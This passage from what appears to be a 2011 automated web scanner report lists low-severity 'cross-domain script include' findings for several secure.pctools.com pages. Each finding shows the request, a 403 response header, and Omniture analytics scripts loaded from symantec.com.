Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:23 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.7. https://secure.pctools.com/info/legalnotices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /info/legalnotices/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /info/legalnotices/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: HIT from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:31 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.8. https://secure.pctools.com/info/privacypolicy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /info/privacypolicy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /info/privacypolicy/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:30 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.9. https://secure.pctools.com/internet-security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /internet-security/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /internet-security/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:20 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.10. https://secure.pctools.com/internet-security/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /internet-security/download/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /internet-security/download/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:21 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.11. https://secure.pctools.com/internet-security/purchase/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /internet-security/purchase/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /internet-security/purchase/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:22 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.12. https://secure.pctools.com/labs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /labs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /labs/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:29 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.13. https://secure.pctools.com/mrc/dispute/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /mrc/dispute/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mrc/dispute/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:26 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.14. https://secure.pctools.com/mrc/infections/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /mrc/infections/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mrc/infections/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:27 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.15. https://secure.pctools.com/mrc/submit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /mrc/submit/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mrc/submit/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www1.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:27 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.16. https://secure.pctools.com/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /partners/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:30 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.17. https://secure.pctools.com/password-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /password-manager/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /password-manager/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.18. https://secure.pctools.com/pc-software/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /pc-software/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pc-software/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; 